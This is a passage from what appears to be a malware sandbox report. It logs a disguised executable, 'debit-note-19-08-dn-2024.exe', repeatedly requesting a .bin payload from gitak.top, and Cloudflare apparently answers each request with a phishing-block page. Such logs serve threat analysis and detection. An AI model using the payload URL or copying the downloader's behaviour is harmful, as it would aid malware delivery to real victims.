2024-08-26 13:32:56 UTC	541	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:32:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCKic73ZccIhBRnrSxVAm11XNxAaCfBc2F6rEJ4TwqkTwQgbIw2f2Ce1SKOpZV9VMwvd2frv0Axf6AFZ%2FP%2BOGywtDZC%2FRg%2F1NnThd5JSzS07e7rHlCE9t0vgGOw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9430d1aa890802-IAD
2024-08-26 13:32:56 UTC	828	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:32:56 UTC	1369	IN	Data Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
2024-08-26 13:32:56 UTC	1369	IN	Data Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 38 4c 4c 45 6d 77 62 78 4c 37 55 37 79 68 55 50 33 76 37 56 6f 58 33 4f 66 41 51 6e 37 61 55 33 32 42 69 36 64 38 56 43 46 6b 51 2d 31 37 32 34 36 37 39 31 37 35 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 Data Ascii: <input type="hidden" name="atok" value="8LLEmwbxL7U7yhUP3v7VoX3OfAQn7aU32Bi6d8VCFkQ-1724679175-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
2024-08-26 13:32:56 UTC	852	IN	Data Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 Data Ascii: r sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
2024-08-26 13:32:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49822	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:33:06 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:33:06 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:33:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9W%2FeaZu%2FCVcMQtMa%2FnTvr8HNX8aEh2pgNTHnsrV5qYTIhVakr1GJBsc7Aui1XQkQK4JDaL9dzeUiYNP5uV7L8OTe8tP0RD8Ov7abu0mVe6kaMOv9nMN4BITOZ3M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943113782705a8-IAD
2024-08-26 13:33:06 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:33:06 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:33:06 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 72 61 65 37 59 6a 71 58 76 4e 50 37 73 45 71 6a 34 41 72 38 4d 63 61 6d 66 56 59 46 32 6c 44 5a 37 73 43 6c 47 69 4c 79 44 32 55 2d 31 37 32 34 36 37 39 31 38 36 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="rae7YjqXvNP7sEqj4Ar8McamfVYF2lDZ7sClGiLyD2U-1724679186-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:33:06 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:33:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49823	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:33:16 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:33:17 UTC	541	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:33:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTuzDTCZVspT%2FJe%2FGLDS3gRBsAzfrL5KGTP82ZqwDjhZDlZn73tLkeYzO7Y3dLi%2BkyrCnnDDt46fnjXw23gxo6eQU87UZ%2BTYDCpveOepdOf71vSMmmTF0WqaBmA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9431555cd40678-IAD
2024-08-26 13:33:17 UTC	828	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:33:17 UTC	1369	IN	Data Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
2024-08-26 13:33:17 UTC	1369	IN	Data Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 38 6c 79 4e 68 72 71 4d 37 45 76 61 77 71 30 49 65 30 4f 7a 50 75 5f 67 6a 74 4f 74 39 78 4d 72 4e 35 42 35 6d 74 71 6f 4c 63 38 2d 31 37 32 34 36 37 39 31 39 37 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 Data Ascii: <input type="hidden" name="atok" value="8lyNhrqM7Evawq0Ie0OzPu_gjtOt9xMrN5B5mtqoLc8-1724679197-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
2024-08-26 13:33:17 UTC	852	IN	Data Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 Data Ascii: r sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
2024-08-26 13:33:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49824	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:33:27 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:33:27 UTC	543	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:33:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wn1EqNPAU5KPLnFtD2V9rFjjN%2FuUR5WpVPcTkvOufDd2mH03vlvsg5ucW5Lq7Ccf%2B%2F4%2B5T9IEULZdFPfgPHrqm1WAhr4vYlNc8jZjVfZR2BpAg9KzV%2FTFvm6ibg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b94319738c53897-IAD
2024-08-26 13:33:27 UTC	826	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:33:27 UTC	1369	IN	Data Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
2024-08-26 13:33:27 UTC	1369	IN	Data Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 57 79 50 37 38 6e 34 6c 5a 62 49 49 61 45 6d 46 6b 71 74 6d 75 74 75 79 43 71 45 4f 42 66 36 45 39 49 46 41 56 44 38 6e 78 6f 59 2d 31 37 32 34 36 37 39 32 30 37 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 Data Ascii: <input type="hidden" name="atok" value="WyP78n4lZbIIaEmFkqtmutuyCqEOBf6E9IFAVD8nxoY-1724679207-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-26 13:33:27 UTC	854	IN	Data Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 Data Ascii: tor sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
2024-08-26 13:33:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49825	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:33:37 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
